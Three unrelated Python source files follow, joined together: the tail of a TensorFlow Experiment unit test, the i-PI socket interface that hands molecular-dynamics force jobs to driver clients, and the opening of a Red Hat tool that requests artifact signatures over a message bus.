eval_metrics='eval_metrics',
train_monitors=[noop_hook],
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
self.assertAllEqual([noop_hook], ex.train_hooks)
another_noop_hook = _NoopHook()
# Assert that the property getter returns a shallow copy.
ex.train_hooks.extend([another_noop_hook])
self.assertAllEqual([noop_hook], ex.train_hooks)
# Assert that the extend API mutates the monitors.
ex.extend_train_hooks([another_noop_hook])
self.assertAllEqual([noop_hook, another_noop_hook], ex.train_hooks)
def test_train_and_evaluate(self):
est = TestEstimator()
noop_hook = _NoopHook()
export_strategy = saved_model_export_utils.make_export_strategy(
est, 'export_input', exports_to_keep=None)
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
train_steps=100,
eval_steps=100,
export_strategies=export_strategy)
ex.train_and_evaluate()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, est.export_count)
self.assertEquals(1, len(est.monitors))
self.assertEquals([noop_hook], est.eval_hooks)
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'task': {
'type': run_config_lib.TaskType.PS,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host2:2222',
num_cores=15,
gpu_memory_fraction=0.314,)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
ex.run_std_server()
# Assert.
mock_server.assert_has_calls(
[test.mock.call().start(), test.mock.call().join()])
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server_raises_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
with self.assertRaises(ValueError):
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.run_std_server()
def test_test(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
ex.test()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
def test_continuous_eval_evaluates_checkpoint_once(self):
# Temporarily disabled until we figure out the threading story on Jenkins.
return
# pylint: disable=unreachable
# The TestEstimator will raise StopIteration the second time evaluate is
# called.
ex = experiment.Experiment(
TestEstimator(max_evals=1),
train_input_fn='train_input',
eval_input_fn='eval_input')
# This should not happen if the logic restricting evaluation of the same
# checkpoint works. We do need some checkpoint though, otherwise Experiment
# will never evaluate.
ex.estimator.fake_checkpoint()
# Start a separate thread with continuous eval
thread = threading.Thread(
target=lambda: ex.continuous_eval(delay_secs=0, throttle_delay_secs=0))
thread.start()
# The thread will die if it evaluates twice, and we should never evaluate
# twice since we don't write another checkpoint. Since we did not enable
# throttling, if it hasn't died after two seconds, we're good.
thread.join(2)
self.assertTrue(thread.is_alive())
# But we should have evaluated once.
count = ex.estimator.eval_count
self.assertEquals(1, count)
if __name__ == '__main__':
test.main()
|
sockets.py
|
"""Deals with the socket communication between the PIMD and driver code.
Copyright (C) 2013, Joshua More and Michele Ceriotti
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Deals with creating the socket, transmitting and receiving data, accepting and
removing different driver routines and the parallelization of the force
calculation.
Classes:
Status: Simple class to keep track of the status, uses bitwise or to give
combinations of different status options.
DriverSocket: Class to deal with communication between a client and
the driver code.
InterfaceSocket: Host server class. Deals with distribution of all the jobs
between the different client servers.
Functions:
Message: Sends a header string through the socket.
Exceptions:
Disconnected: Raised if client has been disconnected.
InvalidStatus: Raised if client has the wrong status. Shouldn't have to be
used if the structure of the program is correct.
"""
__all__ = ['InterfaceSocket']
import numpy as np
import sys, os
import socket, select, threading, signal, string, time
from ipi.utils.depend import depstrip
from ipi.utils.messages import verbosity, warning, info
from ipi.utils.softexit import softexit
HDRLEN = 12
UPDATEFREQ = 10
TIMEOUT = 5.0
SERVERTIMEOUT = 2.0*TIMEOUT
NTIMEOUT = 10
def Message(mystr):
"""Returns a header of standard length HDRLEN."""
return string.ljust(string.upper(mystr), HDRLEN)
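# Illustrative example: Message("ready") == "READY       " (upper-cased and padded to HDRLEN=12 chars).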
class Disconnected(Exception):
"""Disconnected: Raised if client has been disconnected."""
pass
class InvalidSize(Exception):
"""Disconnected: Raised if client returns forces with inconsistent number of atoms."""
pass
class InvalidStatus(Exception):
"""InvalidStatus: Raised if client has the wrong status.
Shouldn't have to be used if the structure of the program is correct.
"""
pass
class Status:
"""Simple class used to keep track of the status of the client.
Uses bitwise or to give combinations of different status options.
i.e. Status.Up | Status.Ready would be understood to mean that the client
was connected and ready to receive the position and cell data.
Attributes:
Disconnected: Flag for if the client has disconnected.
Up: Flag for if the client is running.
      Ready: Flag for if the client is ready to receive position and cell data.
NeedsInit: Flag for if the client is ready to receive forcefield
parameters.
HasData: Flag for if the client is ready to send force data.
Busy: Flag for if the client is busy.
Timeout: Flag for if the connection has timed out.
"""
Disconnected = 0
Up = 1
Ready = 2
NeedsInit = 4
HasData = 8
Busy = 16
Timeout = 32
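   # Illustrative combination: Status.Up | Status.Ready == 3; an individual flag is then tested
   # with a bitwise and, e.g. "if status & Status.Ready: ...".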
class DriverSocket(socket.socket):
"""Deals with communication between the client and driver code.
Deals with sending and receiving the data from the driver code. Keeps track
of the status of the driver. Initialises the driver forcefield, sends the
position and cell data, and receives the force data.
Attributes:
_buf: A string buffer to hold the reply from the driver.
status: Keeps track of the status of the driver.
lastreq: The ID of the last request processed by the client.
locked: Flag to mark if the client has been working consistently on one image.
"""
def __init__(self, socket):
"""Initialises DriverSocket.
Args:
socket: A socket through which the communication should be done.
"""
super(DriverSocket,self).__init__(_sock=socket)
self._buf = np.zeros(0,np.byte)
self.peername = self.getpeername()
self.status = Status.Up
self.waitstatus = False
self.lastreq = None
self.locked = False
def shutdown(self, how=socket.SHUT_RDWR):
self.sendall(Message("exit"))
self.status = Status.Disconnected
super(DriverSocket,self).shutdown(how)
def poll(self):
"""Waits for driver status."""
self.status = Status.Disconnected # sets disconnected as failsafe status, in case _getstatus fails and exceptions are ignored upstream
self.status = self._getstatus()
def _getstatus(self):
"""Gets driver status.
Returns:
An integer labelling the status via bitwise or of the relevant members
of Status.
"""
if not self.waitstatus:
try:
readable, writable, errored = select.select([], [self], [])
if self in writable:
self.sendall(Message("status"))
self.waitstatus = True
except:
return Status.Disconnected
try:
reply = self.recv(HDRLEN)
self.waitstatus = False # got status reply
except socket.timeout:
warning(" @SOCKET: Timeout in status recv!", verbosity.debug )
return Status.Up | Status.Busy | Status.Timeout
except:
return Status.Disconnected
if not len(reply) == HDRLEN:
return Status.Disconnected
elif reply == Message("ready"):
return Status.Up | Status.Ready
elif reply == Message("needinit"):
return Status.Up | Status.NeedsInit
elif reply == Message("havedata"):
return Status.Up | Status.HasData
else:
warning(" @SOCKET: Unrecognized reply: " + str(reply), verbosity.low )
return Status.Up
def recvall(self, dest):
"""Gets the potential energy, force and virial from the driver.
Args:
dest: Object to be read into.
Raises:
Disconnected: Raised if client is disconnected.
Returns:
The data read from the socket to be read into dest.
"""
blen = dest.itemsize*dest.size
if (blen > len(self._buf)):
self._buf.resize(blen)
bpos = 0
ntimeout = 0
while bpos < blen:
timeout = False
# pre-2.5 version.
try:
bpart = ""
bpart = self.recv(blen - bpos)
if len(bpart) == 0: raise socket.timeout # There is a problem if this returns no data
self._buf[bpos:bpos + len(bpart)] = np.fromstring(bpart, np.byte)
except socket.timeout:
warning(" @SOCKET: Timeout in status recvall, trying again!", verbosity.low)
timeout = True
ntimeout += 1
if ntimeout > NTIMEOUT:
warning(" @SOCKET: Couldn't receive within %5d attempts. Time to give up!" % (NTIMEOUT), verbosity.low)
raise Disconnected()
pass
if (not timeout and bpart == 0):
raise Disconnected()
bpos += len(bpart)
# post-2.5 version: slightly more compact for modern python versions
# try:
# bpart = 1
# bpart = self.recv_into(self._buf[bpos:], blen-bpos)
# except socket.timeout:
# print " @SOCKET: Timeout in status recvall, trying again!"
# timeout = True
# pass
# if (not timeout and bpart == 0):
# raise Disconnected()
# bpos += bpart
#TODO this Disconnected() exception currently just causes the program to hang.
#This should do something more graceful
if np.isscalar(dest):
return np.fromstring(self._buf[0:blen], dest.dtype)[0]
else:
return np.fromstring(self._buf[0:blen], dest.dtype).reshape(dest.shape)
def initialize(self, rid, pars):
"""Sends the initialization string to the driver.
Args:
rid: The index of the request, i.e. the replica that
the force calculation is for.
pars: The parameter string to be sent to the driver.
Raises:
InvalidStatus: Raised if the status is not NeedsInit.
"""
if self.status & Status.NeedsInit:
try:
self.sendall(Message("init"))
self.sendall(np.int32(rid))
self.sendall(np.int32(len(pars)))
self.sendall(pars)
except:
self.poll()
return
else:
raise InvalidStatus("Status in init was " + self.status)
def sendpos(self, pos, cell):
"""Sends the position and cell data to the driver.
Args:
pos: An array containing the atom positions.
cell: A cell object giving the system box.
Raises:
InvalidStatus: Raised if the status is not Ready.
"""
if (self.status & Status.Ready):
try:
self.sendall(Message("posdata"))
self.sendall(cell.h, 9*8)
self.sendall(cell.ih, 9*8)
self.sendall(np.int32(len(pos)/3))
self.sendall(pos, len(pos)*8)
except:
self.poll()
return
else:
raise InvalidStatus("Status in sendpos was " + self.status)
def getforce(self):
"""Gets the potential energy, force and virial from the driver.
Raises:
InvalidStatus: Raised if the status is not HasData.
Disconnected: Raised if the driver has disconnected.
Returns:
A list of the form [potential, force, virial, extra].
"""
if (self.status & Status.HasData):
self.sendall(Message("getforce"));
reply = ""
while True:
try:
reply = self.recv(HDRLEN)
except socket.timeout:
warning(" @SOCKET: Timeout in getforce, trying again!", verbosity.low)
continue
if reply == Message("forceready"):
break
else:
warning(" @SOCKET: Unexpected getforce reply: %s" % (reply), verbosity.low)
if reply == "":
raise Disconnected()
else:
raise InvalidStatus("Status in getforce was " + self.status)
mu = np.float64()
mu = self.recvall(mu)
mlen = np.int32()
mlen = self.recvall(mlen)
mf = np.zeros(3*mlen,np.float64)
mf = self.recvall(mf)
mvir = np.zeros((3,3),np.float64)
mvir = self.recvall(mvir)
      #! Machinery to return a string as an "extra" field. Comment this out if you are using an old patched driver that does not return anything!
mlen = np.int32()
mlen = self.recvall(mlen)
if mlen > 0 :
mxtra = np.zeros(mlen,np.character)
mxtra = self.recvall(mxtra)
mxtra = "".join(mxtra)
else:
mxtra = ""
#!TODO must set up a machinery to intercept the "extra" return field
return [mu, mf, mvir, mxtra]
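   # Wire order received above: potential (float64), force-array length (int32), forces
   # (3*N float64), virial (3x3 float64), then an optional length-prefixed "extra" string.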
class InterfaceSocket(object):
"""Host server class.
Deals with distribution of all the jobs between the different client servers
and both initially and as clients either finish or are disconnected.
Deals with cleaning up after all calculations are done. Also deals with the
threading mechanism, and cleaning up if the interface is killed.
Attributes:
address: A string giving the name of the host network.
port: An integer giving the port the socket will be using.
slots: An integer giving the maximum allowed backlog of queued clients.
mode: A string giving the type of socket used.
latency: A float giving the number of seconds the interface will wait
before updating the client list.
timeout: A float giving a timeout limit for considering a calculation dead
and dropping the connection.
dopbc: A boolean which decides whether or not to fold the bead positions
back into the unit cell before passing them to the client code.
      server: The socket used for data transmission.
clients: A list of the driver clients connected to the server.
requests: A list of all the jobs required in the current PIMD step.
jobs: A list of all the jobs currently running.
_poll_thread: The thread the poll loop is running on.
_prev_kill: Holds the signals to be sent to clean up the main thread
when a kill signal is sent.
_poll_true: A boolean giving whether the thread is alive.
_poll_iter: An integer used to decide whether or not to check for
         client connections. It is used as a counter; once it becomes higher
than the pre-defined number of steps between checks the socket will
update the list of clients and then be reset to zero.
"""
def __init__(self, address="localhost", port=31415, slots=4, mode="unix", latency=1e-3, timeout=1.0, dopbc=True):
"""Initialises interface.
Args:
address: An optional string giving the name of the host server.
Defaults to 'localhost'.
port: An optional integer giving the port number. Defaults to 31415.
slots: An optional integer giving the maximum allowed backlog of
queueing clients. Defaults to 4.
mode: An optional string giving the type of socket. Defaults to 'unix'.
latency: An optional float giving the time in seconds the socket will
wait before updating the client list. Defaults to 1e-3.
timeout: Length of time waiting for data from a client before we assume
the connection is dead and disconnect the client.
dopbc: A boolean which decides whether or not to fold the bead positions
back into the unit cell before passing them to the client code.
Raises:
NameError: Raised if mode is not 'unix' or 'inet'.
"""
self.address = address
self.port = port
self.slots = slots
self.mode = mode
self.latency = latency
self.timeout = timeout
self.dopbc = dopbc
self._poll_thread = None
self._prev_kill = {}
self._poll_true = False
self._poll_iter = 0
def open(self):
"""Creates a new socket.
Used so that we can create a interface object without having to also
create the associated socket object.
"""
if self.mode == "unix":
self.server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
self.server.bind("/tmp/ipi_" + self.address)
info("Created unix socket with address " + self.address, verbosity.medium)
except:
raise ValueError("Error opening unix socket. Check if a file " + ("/tmp/ipi_" + self.address) + " exists, and remove it if unused.")
elif self.mode == "inet":
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((self.address,self.port))
info("Created inet socket with address " + self.address + " and port number " + str(self.port), verbosity.medium)
else:
raise NameError("InterfaceSocket mode " + self.mode + " is not implemented (should be unix/inet)")
self.server.listen(self.slots)
self.server.settimeout(SERVERTIMEOUT)
self.clients = []
self.requests = []
self.jobs = []
def close(self):
"""Closes down the socket."""
info(" @SOCKET: Shutting down the driver interface.", verbosity.low )
for c in self.clients[:]:
if (c.status & Status.Up):
c.shutdown(socket.SHUT_RDWR)
self.server.shutdown(socket.SHUT_RDWR)
self.server.close()
if self.mode == "unix":
os.unlink("/tmp/ipi_" + self.address)
def queue(self, atoms, cell, pars=None, reqid=0):
"""Adds a request.
      Note that the pars dictionary needs to be sent as a string of a
standard format so that the initialization of the driver can be done.
Args:
atoms: An Atoms object giving the atom positions.
cell: A Cell object giving the system box.
pars: An optional dictionary giving the parameters to be sent to the
driver for initialization. Defaults to {}.
reqid: An optional integer that identifies requests of the same type,
e.g. the bead index
Returns:
A dict describing the request, of the form {'pos': the bead positions
(folded back into the unit cell if dopbc is set), 'cell': Cell object
giving the system box, 'pars': parameter string, 'result': holds the
result as a list once the computation is done, 'status': a string
labelling the status, 'id': the id of the request, usually the bead
number, 'start': the starting time for the calculation, used to check
for timeouts}.
"""
par_str = " "
if not pars is None:
for k,v in pars.items():
par_str += k + " : " + str(v) + " , "
else:
par_str = " "
# APPLY PBC -- this is useful for codes such as LAMMPS that don't do full PBC when computing distances
pbcpos = depstrip(atoms.q).copy()
if self.dopbc:
cell.array_pbc(pbcpos)
newreq = {"pos": pbcpos, "cell": cell, "pars": par_str,
"result": None, "status": "Queued", "id": reqid,
"start": -1 }
self.requests.append(newreq)
return newreq
def release(self, request):
"""Empties the list of requests once finished.
Args:
request: A list of requests that are done.
"""
if request in self.requests:
self.requests.remove(request)
def pool_update(self):
"""Deals with keeping the pool of client drivers up-to-date during a
force calculation step.
Deals with maintaining the client list. Clients that have
disconnected are removed and their jobs removed from the list of
running jobs and new clients are connected to the server.
"""
for c in self.clients[:]:
if not (c.status & Status.Up):
try:
warning(" @SOCKET: Client " + str(c.peername) +" died or got unresponsive(C). Removing from the list.", verbosity.low)
c.shutdown(socket.SHUT_RDWR)
c.close()
except:
pass
c.status = Status.Disconnected
self.clients.remove(c)
for [k,j] in self.jobs[:]:
if j is c:
self.jobs = [ w for w in self.jobs if not ( w[0] is k and w[1] is j ) ] # removes pair in a robust way
#self.jobs.remove([k,j])
k["status"] = "Queued"
k["start"] = -1
keepsearch = True
while keepsearch:
readable, writable, errored = select.select([self.server], [], [], 0.0)
if self.server in readable:
client, address = self.server.accept()
client.settimeout(TIMEOUT)
driver = DriverSocket(client)
info(" @SOCKET: Client asked for connection from "+ str( address ) +". Now hand-shaking.", verbosity.low)
driver.poll()
if (driver.status & Status.Up):  # bitwise AND: only add the client if the Up flag is actually set
self.clients.append(driver)
info(" @SOCKET: Handshaking was successful. Added to the client list.", verbosity.low)
else:
warning(" @SOCKET: Handshaking failed. Dropping connection.", verbosity.low)
client.shutdown(socket.SHUT_RDWR)
client.close()
else:
keepsearch = False
def pool_distribute(self):
"""Deals with keeping the list of jobs up-to-date during a force
calculation step.
Deals with maintaining the jobs list. Gets data from drivers that have
finished their calculation and removes that job from the list of running
jobs, adds jobs to free clients and initialises the forcefields of new
clients.
"""
for c in self.clients:
if c.status == Status.Disconnected:  # client disconnected; force a pool_update
self._poll_iter = UPDATEFREQ
return
if not c.status & ( Status.Ready | Status.NeedsInit ):
c.poll()
for [r,c] in self.jobs[:]:
if c.status & Status.HasData:
try:
r["result"] = c.getforce()
if len(r["result"][1]) != len(r["pos"]):
raise InvalidSize
except Disconnected:
c.status = Status.Disconnected
continue
except InvalidSize:
warning(" @SOCKET: Client returned an inconsistent number of forces. Will mark as disconnected and try to carry on.", verbosity.low)
c.status = Status.Disconnected
continue
except:
warning(" @SOCKET: Client got in a awkward state during getforce. Will mark as disconnected and try to carry on.", verbosity.low)
c.status = Status.Disconnected
continue
c.poll()
while c.status & Status.Busy: # waits, but check if we got stuck.
if self.timeout > 0 and r["start"] > 0 and time.time() - r["start"] > self.timeout:
warning(" @SOCKET: Timeout! HASDATA for bead " + str(r["id"]) + " has been running for " + str(time.time() - r["start"]) + " sec.", verbosity.low)
warning(" @SOCKET: Client " + str(c.peername) + " died or got unresponsive(A). Disconnecting.", verbosity.low)
try:
c.shutdown(socket.SHUT_RDWR)
except:
pass
c.close()
c.status = Status.Disconnected
continue
c.poll()
if not (c.status & Status.Up):
warning(" @SOCKET: Client died a horrible death while getting forces. Will try to cleanup.", verbosity.low)
continue
r["status"] = "Done"
c.lastreq = r["id"] # saves the ID of the request that the client has just processed
self.jobs = [ w for w in self.jobs if not ( w[0] is r and w[1] is c ) ] # removes pair in a robust way
if self.timeout > 0 and c.status != Status.Disconnected and r["start"] > 0 and time.time() - r["start"] > self.timeout:
warning(" @SOCKET: Timeout! Request for bead " + str( r["id"]) + " has been running for " + str(time.time() - r["start"]) + " sec.", verbosity.low)
warning(" @SOCKET: Client " + str(c.peername) + " died or got unresponsive(B). Disconnecting.",verbosity.low)
try:
c.shutdown(socket.SHUT_RDWR)
except socket.error:
e = sys.exc_info()
warning(" @SOCKET: could not shut down cleanly the socket. %s: %s in file '%s' on line %d" % (e[0].__name__, e[1], os.path.basename(e[2].tb_frame.f_code.co_filename), e[2].tb_lineno), verbosity.low )
c.close()
c.poll()
c.status = Status.Disconnected
freec = self.clients[:]
for [r2, c] in self.jobs:
freec.remove(c)
pendr = [r for r in self.requests if r["status"] == "Queued"]  # only requests still waiting for a client
for fc in freec[:]:
matched = False
# first, makes sure that the client is REALLY free
if not (fc.status & Status.Up):
self.clients.remove(fc) # if fc is in freec it can't be associated with a job (we just checked for that above)
continue
if fc.status & Status.HasData:
continue
if not (fc.status & (Status.Ready | Status.NeedsInit | Status.Busy) ):
warning(" @SOCKET: Client " + str(fc.peername) + " is in an unexpected status " + str(fc.status) + " at (1). Will try to keep calm and carry on.", verbosity.low)
continue
for match_ids in ( "match", "none", "free", "any" ):
for r in pendr[:]:
if match_ids == "match" and not fc.lastreq is r["id"]:
continue
elif match_ids == "none" and not fc.lastreq is None:
continue
elif match_ids == "free" and fc.locked:
continue
info(" @SOCKET: Assigning [%5s] request id %4s to client with last-id %4s (% 3d/% 3d : %s)" % (match_ids, str(r["id"]), str(fc.lastreq), self.clients.index(fc), len(self.clients), str(fc.peername) ), verbosity.high )
while fc.status & Status.Busy:
fc.poll()
if fc.status & Status.NeedsInit:
fc.initialize(r["id"], r["pars"])
fc.poll()
while fc.status & Status.Busy: # waits for initialization to finish. hopefully this is fast
fc.poll()
if fc.status & Status.Ready:
fc.sendpos(r["pos"], r["cell"])
r["status"] = "Running"
r["start"] = time.time() # sets start time for the request
fc.poll()
self.jobs.append([r,fc])
fc.locked = (fc.lastreq is r["id"])
matched = True
# removes r from the list of pending jobs
pendr = [nr for nr in pendr if (not nr is r)]
break
else:
warning(" @SOCKET: Client " + str(fc.peername) + " is in an unexpected status " + str(fc.status) + " at (2). Will try to keep calm and carry on.", verbosity.low)
if matched:
break # doesn't do a second (or third) round if it managed
# to assign the job
def _kill_handler(self, signal, frame):
"""Deals with handling a kill call gracefully.
Prevents any of the threads becoming zombies, by intercepting a
kill signal using the standard python function signal.signal() and
then closing the socket and the spawned threads before closing the main
thread. Called when the signals SIGINT and SIGTERM are received.
Args:
signal: An integer giving the number of the signal that was received.
frame: Current stack frame.
"""
warning(" @SOCKET: Kill signal. Trying to make a clean exit.", verbosity.low)
self.end_thread()
softexit.trigger(" @SOCKET: Kill signal received")
try:
self.__del__()
except:
pass
if signal in self._prev_kill:
self._prev_kill[signal](signal, frame)
def _poll_loop(self):
"""The main thread loop.
Runs until either the program finishes or a kill call is sent. Updates
the pool of clients every UPDATEFREQ loops and loops every latency
seconds until _poll_true becomes false.
"""
info(" @SOCKET: Starting the polling thread main loop.", verbosity.low)
self._poll_iter = UPDATEFREQ
while self._poll_true:
time.sleep(self.latency)
# makes sure to remove the last dead client as soon as possible -- and to get clients if we are dry
if self._poll_iter >= UPDATEFREQ or len(self.clients)==0 or (len(self.clients) > 0 and not(self.clients[0].status & Status.Up)):
self.pool_update()
self._poll_iter = 0
self._poll_iter += 1
self.pool_distribute()
if os.path.exists("EXIT"): # softexit
info(" @SOCKET: Soft exit request from file EXIT. Flushing job queue.", verbosity.low)
# releases all pending requests
for r in self.requests:
r["status"] = "Exit"
for c in self.clients:
try:
c.shutdown(socket.SHUT_RDWR)
c.close()
except:
pass
# flush it all down the drain
self.clients = []
self.jobs = []
self._poll_thread = None
def started(self):
"""Returns a boolean specifying whether the thread has started yet."""
return (not self._poll_thread is None)
def start_thread(self):
"""Spawns a new thread.
Splits the main program into two threads, one that runs the polling loop
which updates the client list, and one which gets the data. Also sets up
the machinery to deal with a kill call: in the case of a Ctrl-C or
similar signal, the signal is intercepted by the _kill_handler function,
which cleans up the spawned thread before closing the main thread.
Raises:
NameError: Raised if the polling thread already exists.
"""
self.open()
if not self._poll_thread is None:
raise NameError("Polling thread already started")
self._poll_thread = threading.Thread(target=self._poll_loop, name="poll_" + self.address)
self._poll_thread.daemon = True
self._prev_kill[signal.SIGINT] = signal.signal(signal.SIGINT, self._kill_handler)
self._prev_kill[signal.SIGTERM] = signal.signal(signal.SIGTERM, self._kill_handler)
self._poll_true = True
self._poll_thread.start()
def end_thread(self):
"""Closes the spawned thread.
Cleans up the spawned thread. First sets _poll_true to False to indicate
that the polling loop should exit, then joins the spawned thread and
removes it.
"""
self._poll_true = False
if not self._poll_thread is None:
self._poll_thread.join()
self._poll_thread = None
self.close()
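# A minimal usage sketch of the interface above (illustrative only: `atoms`
# and `cell` stand in for the Atoms/Cell objects defined elsewhere in the
# code base, so this is not runnable on its own):
#
#   interface = InterfaceSocket(address="localhost", port=31415, mode="inet")
#   interface.start_thread()              # opens the socket and starts the poll loop
#   req = interface.queue(atoms, cell, pars={"verbose": 1}, reqid=0)
#   while req["status"] != "Done":        # the poll loop fills in req["result"]
#       time.sleep(interface.latency)
#   interface.release(req)
#   interface.end_thread()                # joins the poll thread and closes the socket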
|
umb_producer.py
|
#!/usr/bin/env python2
import base64
import json
import logging
import ssl
import subprocess
import sys
import threading
import click
import requests
from rhmsg.activemq.producer import AMQProducer
from rhmsg.activemq.consumer import AMQConsumer
# Expose errors during signing for debugging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
######################################################################
URLS = {
'dev': (
'amqps://messaging-devops-broker03.dev1.ext.devlab.redhat.com:5671',
'amqps://messaging-devops-broker04.dev1.ext.devlab.redhat.com:5671',
),
'qa': (
'amqps://messaging-devops-broker03.web.qa.ext.phx1.redhat.com:5671',
'amqps://messaging-devops-broker04.web.qa.ext.phx1.redhat.com:5671',
),
'stage': (
'amqps://messaging-devops-broker03.web.stage.ext.phx2.redhat.com:5671',
'amqps://messaging-devops-broker04.web.stage.ext.phx2.redhat.com:5671',
),
'prod': (
'amqps://messaging-devops-broker03.web.prod.ext.phx2.redhat.com:5671',
'amqps://messaging-devops-broker04.web.prod.ext.phx2.redhat.com:5671',
),
}
TOPIC = 'VirtualTopic.eng.art.artifact.sign'
# TODO: In the future we need to handle 'rhcos' having '4.1'
# hard-coded into the URL path.
MESSAGE_DIGESTS = {
'openshift': 'https://mirror.openshift.com/pub/openshift-v4/{arch}/clients/{release_stage}/{release_name}/sha256sum.txt',
'rhcos': 'https://mirror.openshift.com/pub/openshift-v4/{arch}/dependencies/rhcos/{release_name_xy}/{release_name}/sha256sum.txt'
}
DEFAULT_CA_CHAIN = "/etc/pki/ca-trust/source/anchors/RH-IT-Root-CA.crt"
# This is the JSON we send OVER the bus when requesting signatures
SIGN_REQUEST_MESSAGE_FIELDS = [
"artifact",
# Added by ART
"artifact_meta",
"request_id",
"requestor",
"sig_keyname",
]
ART_CONSUMER = 'Consumer.openshift-art-signatory.{env}.VirtualTopic.eng.robosignatory.art.sign'
def get_release_tag(release_name, arch):
"""Determine the quay destination tag where a release image lives, based on the
release name and arch (since we can now have multiple arches for each release name)
- make sure it includes the arch in the tag to distinguish it from any other release of the same name.
e.g.:
(4.2.0-0.nightly-s390x-2019-12-10-202536, s390x) remains 4.2.0-0.nightly-s390x-2019-12-10-202536
(4.3.0-0.nightly-2019-12-07-121211, x86_64) becomes 4.3.0-0.nightly-2019-12-07-121211-x86_64
"""
return release_name if arch in release_name else "{}-{}".format(release_name, arch)
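# Quick illustration of the rule above, using the examples from the docstring:
#   get_release_tag("4.3.0-0.nightly-2019-12-07-121211", "x86_64")
#     -> "4.3.0-0.nightly-2019-12-07-121211-x86_64"
#   get_release_tag("4.2.0-0.nightly-s390x-2019-12-10-202536", "s390x")
#     -> "4.2.0-0.nightly-s390x-2019-12-10-202536"   (arch already in the name)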
######################################################################
# Click stuff! Define these here and reuse them later because having
# 'required' options in the global context creates a poor user
# experience. Running "this-script <sub-command> --help" won't work
# until every global required option is provided.
context_settings = dict(help_option_names=['-h', '--help'])
requestor = click.option("--requestor", required=True, metavar="USERID",
help="The user who requested the signature")
product = click.option("--product", required=True,
type=click.Choice(["openshift", "rhcos"]),
help="Which product this signature is for")
request_id = click.option("--request-id", required=True, metavar="BUILDURL",
help="Unique build job identifier for this signing request, "
"use the job URL from Jenkins: $env.BUILD_URL")
sig_keyname = click.option("--sig-keyname", required=True,
type=click.Choice(['test', 'redhatrelease2', 'beta2']),
help="Name of the key to have sign our request")
release_name_opt = click.option("--release-name", required=True, metavar="SEMVER",
help="Numerical name of this release, for example: 4.1.0-rc.10")
arch_opt = click.option("--arch", required=True, metavar="ARCHITECTURE",
type=click.Choice(['x86_64', 'ppc64le', 's390x']),
help="Which architecture this release was built for")
client_type = click.option("--client-type", required=True, metavar="VAL",
help="What repo is this image for?")
client_cert = click.option("--client-cert", required=True, metavar="CERT-PATH",
type=click.Path(exists=True),
help="Path to the client certificate for UMB authentication")
client_key = click.option("--client-key", required=True, metavar="KEY-PATH",
type=click.Path(exists=True),
help="Path to the client key for UMB authentication")
env_click_obj = click.option("--env", required=False, metavar="ENVIRONMENT",
default='stage',
type=click.Choice(['dev', 'stage', 'prod']),
help="Which UMB environment to send to")
noop = click.option("--noop", type=bool, is_flag=True, default=False,
help="If given, DO NOT request signature, "
"show the JSON that WOULD be sent over the bus")
ca_certs = click.option("--ca-certs", type=click.Path(exists=True),
default=DEFAULT_CA_CHAIN,
help="Manually specify the path to the RHIT CA Trust Chain. "
"Default: {}".format(DEFAULT_CA_CHAIN))
digest = click.option("--digest", metavar="DIGEST", help="Pass the digest that should be signed")
# ---------------------------------------------------------------------
env_value = None  # Will be set to the value of the --env option (env_click_obj)
@click.group(context_settings=context_settings)
def cli(**kwargs):
"""Helper utility for internal Red Hat use ONLY. Use in a build job to
request signatures for various artifacts produced as part of an
OpenShift 4.x release. Signatures are requested by sending a JSON blob
over the Universal Message Bus to the 'robosignatory' (RADAS).
You may override the default path to look for the Red Hat IT
Certificate Authority trust chain by using the --ca-certs option in
the global context (before the sub-command).
"""
pass
######################################################################
# Helpers
def get_digest_base64(location):
"""Download the sha256sum.txt message digest file at the given
`location`.
:return: A `string` of the base64-encoded message digest
"""
res = requests.get(location,
verify=ssl.get_default_verify_paths().openssl_cafile)
if res.status_code == 200:
# b64encode needs a bytes type input, use the dedicated
# 'encode' method to turn str=>bytes. The result of
# `b64encode` is a bytes type. Later when we go to serialize
# this with json it needs to be a str type so we will decode
# the bytes=>str now.
return base64.b64encode(res.text.encode()).decode()
else:
raise Exception(res.reason)
def presend_validation(message):
"""Verify the message we want to send over the bus has all the
required fields
"""
for field in SIGN_REQUEST_MESSAGE_FIELDS:
if field not in message:
return field
return True
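# Illustration of the return convention above: True when every field is
# present, otherwise the name of the first missing field. That is why the
# sub-commands below compare the result with `is True` rather than relying
# on truthiness -- a returned field name is also truthy.
#   presend_validation({f: "x" for f in SIGN_REQUEST_MESSAGE_FIELDS})  # -> True
#   presend_validation({"artifact": "x"})  # -> "artifact_meta"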
def oc_image_info(pullspec):
"""Get metadata for an image at the given `pullspec`
:return: a dict with the serialized JSON from the 'oc image info'
call
"""
image_info_raw = subprocess.check_output(
['oc', 'image', 'info', '-o', 'json', pullspec])
return json.loads(image_info_raw)
def get_bus_producer(env, certificate, private_key, trusted_certificates):
"""This is just a wrapper around creating a producer. We're going to
